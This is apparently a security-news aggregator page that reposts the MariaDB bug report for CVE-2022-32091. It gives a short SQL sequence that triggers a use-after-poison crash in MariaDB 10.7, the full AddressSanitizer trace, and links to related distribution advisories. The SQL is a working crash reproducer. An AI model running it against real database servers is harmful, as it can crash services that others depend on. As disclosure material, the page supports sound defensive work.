Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-32091: [MDEV-26431] MariaDB Server use-after-poison - Jira

MariaDB v10.7 was discovered to contain an use-after-poison in in __interceptor_memset at /libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc.

CVE
#sql#linux#c++#jira

CREATE TABLE v0 ( v2 BIGINT , v1 BIGINT ) ENGINE = MEMORY ROW_FORMAT = COMPRESSED AS SELECT 59218101.000000 AS v3 UNION SELECT FALSE ;

START TRANSACTION ;

SELECT instr ( v1 , DES_ENCRYPT ( ‘x’ REGEXP ‘x’ , ‘x’ ) ) BETWEEN v3 AND -1 FROM v0 ;

SELECT DISTINCT v2 IN ( COLLATION ( AVG ( ‘x’ ) ) + -128 , ‘x’ , ‘x’ ) FROM v0 WHERE v2 IS NOT NULL ;

UPDATE v0 SET v2 = v3 + 69 ;

INSERT INTO v0 ( ) SELECT v1 , v1 FROM v0 ;

=================================================================

==2933067==ERROR: AddressSanitizer: use-after-poison on address 0x6290000a6080 at pc 0x7fb1687ce7b7 bp 0x7fb1435a5730 sp 0x7fb1435a4ed8

WRITE of size 944 at 0x6290000a6080 thread T14

#0 0x7fb1687ce7b6 in \_\_interceptor\_memset /build/gcc/src/gcc/libsanitizer/sanitizer\_common/sanitizer\_common\_interceptors.inc:799

#1 0x55c6bfcc41e9 in JOIN::make\_aggr\_tables\_info() /experiment/mariadb-server/sql/sql\_select.cc:3694

#2 0x55c6bfcf2e71 in JOIN::optimize\_stage2() /experiment/mariadb-server/sql/sql\_select.cc:3225

#3 0x55c6bfcfcd06 in JOIN::optimize\_inner() /experiment/mariadb-server/sql/sql\_select.cc:2479

#4 0x55c6bfcfe7b0 in JOIN::optimize() /experiment/mariadb-server/sql/sql\_select.cc:1809

#5 0x55c6bfcfea0d in mysql\_select(THD\*, TABLE\_LIST\*, List<Item>&, Item\*, unsigned int, st\_order\*, st\_order\*, Item\*, st\_order\*, unsigned long long, select\_result\*, st\_select\_lex\_unit\*, st\_select\_lex\*) /experiment/mariadb-server/sql/sql\_select.cc:4977

#6 0x55c6bfd00654 in handle\_select(THD\*, LEX\*, select\_result\*, unsigned long) /experiment/mariadb-server/sql/sql\_select.cc:545

#7 0x55c6bfb43d7c in execute\_sqlcom\_select /experiment/mariadb-server/sql/sql\_parse.cc:6256

#8 0x55c6bfb6d420 in mysql\_execute\_command(THD\*, bool) /experiment/mariadb-server/sql/sql\_parse.cc:3946

#9 0x55c6bfb725a0 in mysql\_parse(THD\*, char\*, unsigned int, Parser\_state\*) /experiment/mariadb-server/sql/sql\_parse.cc:8030

#10 0x55c6bfb7860b in dispatch\_command(enum\_server\_command, THD\*, char\*, unsigned int, bool) /experiment/mariadb-server/sql/sql\_parse.cc:1896

#11 0x55c6bfb7d73c in do\_command(THD\*, bool) /experiment/mariadb-server/sql/sql\_parse.cc:1404

#12 0x55c6bff38e56 in do\_handle\_one\_connection(CONNECT\*, bool) /experiment/mariadb-server/sql/sql\_connect.cc:1418

#13 0x55c6bff3933c in handle\_one\_connection /experiment/mariadb-server/sql/sql\_connect.cc:1312

#14 0x55c6c09c9c2b in pfs\_spawn\_thread /experiment/mariadb-server/storage/perfschema/pfs.cc:2201

#15 0x7fb1681ba258 in start\_thread (/usr/lib/libpthread.so.0+0x9258)

#16 0x7fb167d655e2 in \_\_GI\_\_\_clone (/usr/lib/libc.so.6+0xfe5e2)

0x6290000a6080 is located 3712 bytes inside of 16400-byte region [0x6290000a5200,0x6290000a9210)

allocated by thread T14 here:

#0 0x7fb16884c279 in \_\_interceptor\_malloc /build/gcc/src/gcc/libsanitizer/asan/asan\_malloc\_linux.cpp:145

#1 0x55c6c12fc9a8 in my\_malloc /experiment/mariadb-server/mysys/my\_malloc.c:90

#2 0x55c6c12e9414 in alloc\_root /experiment/mariadb-server/mysys/my\_alloc.c:332

#3 0x55c6bfc3d047 in Query\_arena::alloc(unsigned long) /experiment/mariadb-server/sql/sql\_class.h:1206

#4 0x55c6bfc3d047 in update\_ref\_and\_keys /experiment/mariadb-server/sql/sql\_select.cc:7110

#5 0x55c6bfce537e in make\_join\_statistics /experiment/mariadb-server/sql/sql\_select.cc:5377

#6 0x55c6bfcfc73b in JOIN::optimize\_inner() /experiment/mariadb-server/sql/sql\_select.cc:2453

#7 0x55c6bfcfe7b0 in JOIN::optimize() /experiment/mariadb-server/sql/sql\_select.cc:1809

#8 0x55c6bfcfea0d in mysql\_select(THD\*, TABLE\_LIST\*, List<Item>&, Item\*, unsigned int, st\_order\*, st\_order\*, Item\*, st\_order\*, unsigned long long, select\_result\*, st\_select\_lex\_unit\*, st\_select\_lex\*) /experiment/mariadb-server/sql/sql\_select.cc:4977

#9 0x55c6bfd00654 in handle\_select(THD\*, LEX\*, select\_result\*, unsigned long) /experiment/mariadb-server/sql/sql\_select.cc:545

#10 0x55c6bfb43d7c in execute\_sqlcom\_select /experiment/mariadb-server/sql/sql\_parse.cc:6256

#11 0x55c6bfb6d420 in mysql\_execute\_command(THD\*, bool) /experiment/mariadb-server/sql/sql\_parse.cc:3946

#12 0x55c6bfb725a0 in mysql\_parse(THD\*, char\*, unsigned int, Parser\_state\*) /experiment/mariadb-server/sql/sql\_parse.cc:8030

#13 0x55c6bfb7860b in dispatch\_command(enum\_server\_command, THD\*, char\*, unsigned int, bool) /experiment/mariadb-server/sql/sql\_parse.cc:1896

#14 0x55c6bfb7d73c in do\_command(THD\*, bool) /experiment/mariadb-server/sql/sql\_parse.cc:1404

#15 0x55c6bff38e56 in do\_handle\_one\_connection(CONNECT\*, bool) /experiment/mariadb-server/sql/sql\_connect.cc:1418

#16 0x55c6bff3933c in handle\_one\_connection /experiment/mariadb-server/sql/sql\_connect.cc:1312

#17 0x55c6c09c9c2b in pfs\_spawn\_thread /experiment/mariadb-server/storage/perfschema/pfs.cc:2201

#18 0x7fb1681ba258 in start\_thread (/usr/lib/libpthread.so.0+0x9258)

Thread T14 created by T0 here:

#0 0x7fb1687edfa7 in \_\_interceptor\_pthread\_create /build/gcc/src/gcc/libsanitizer/asan/asan\_interceptors.cpp:216

#1 0x55c6c09c9ea9 in my\_thread\_create /experiment/mariadb-server/storage/perfschema/my\_thread.h:48

#2 0x55c6c09c9ea9 in pfs\_spawn\_thread\_v1 /experiment/mariadb-server/storage/perfschema/pfs.cc:2252

#3 0x55c6bf83ab3c in inline\_mysql\_thread\_create /experiment/mariadb-server/include/mysql/psi/mysql\_thread.h:1139

#4 0x55c6bf83ab3c in create\_thread\_to\_handle\_connection(CONNECT\*) /experiment/mariadb-server/sql/mysqld.cc:5934

#5 0x55c6bf8467b6 in handle\_accepted\_socket(st\_mysql\_socket, st\_mysql\_socket) /experiment/mariadb-server/sql/mysqld.cc:6055

#6 0x55c6bf84736f in handle\_connections\_sockets() /experiment/mariadb-server/sql/mysqld.cc:6179

#7 0x55c6bf84aa52 in mysqld\_main(int, char\*\*) /experiment/mariadb-server/sql/mysqld.cc:5829

#8 0x7fb167c8eb24 in \_\_libc\_start\_main (/usr/lib/libc.so.6+0x27b24)

SUMMARY: AddressSanitizer: use-after-poison /build/gcc/src/gcc/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:799 in __interceptor_memset

Shadow bytes around the buggy address:

0x0c528000cbc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

0x0c528000cbd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

0x0c528000cbe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

0x0c528000cbf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

0x0c528000cc00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

=>0x0c528000cc10:[f7]00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

0x0c528000cc20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

0x0c528000cc30: 00 00 00 00 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7

0x0c528000cc40: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7

0x0c528000cc50: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7

0x0c528000cc60: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7

Shadow byte legend (one shadow byte represents 8 application bytes):

Addressable: 00

Partially addressable: 01 02 03 04 05 06 07

Heap left redzone: fa

Freed heap region: fd

Stack left redzone: f1

Stack mid redzone: f2

Stack right redzone: f3

Stack after return: f5

Stack use after scope: f8

Global redzone: f9

Global init order: f6

Poisoned by user: f7

Container overflow: fc

Array cookie: ac

Intra object redzone: bb

ASan internal: fe

Left alloca redzone: ca

Right alloca redzone: cb

Shadow gap: cc

==2933067==ABORTING

Related news

Gentoo Linux Security Advisory 202405-25

Gentoo Linux Security Advisory 202405-25 - Multiple vulnerabilities have been discovered in MariaDB, the worst fo which can lead to arbitrary execution of code. Versions greater than or equal to 10.11.3:10.11 are affected.

Red Hat Security Advisory 2023-7633-01

Red Hat Security Advisory 2023-7633-01 - An update for rh-mariadb105-galera and rh-mariadb105-mariadb is now available for Red Hat Software Collections. Issues addressed include a null pointer vulnerability.

Red Hat Security Advisory 2023-5684-01

Red Hat Security Advisory 2023-5684-01 - MariaDB is a multi-user, multi-threaded SQL database server that is binary compatible with MySQL. Issues addressed include a null pointer vulnerability.

Red Hat Security Advisory 2023-5683-01

Red Hat Security Advisory 2023-5683-01 - MariaDB is a multi-user, multi-threaded SQL database server that is binary compatible with MySQL. Issues addressed include a null pointer vulnerability.

Red Hat Security Advisory 2023-5259-01

Red Hat Security Advisory 2023-5259-01 - MariaDB is a multi-user, multi-threaded SQL database server that is binary compatible with MySQL. Issues addressed include a null pointer vulnerability.

Ubuntu Security Notice USN-5739-1

Ubuntu Security Notice 5739-1 - Several security issues were discovered in MariaDB and this update includes new upstream MariaDB versions to fix these issues. MariaDB has been updated to 10.3.37 in Ubuntu 20.04 LTS and to 10.6.11 in Ubuntu 22.04 LTS and Ubuntu 22.10. In addition to security fixes, the updated packages contain bug fixes, new features, and possibly incompatible changes.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907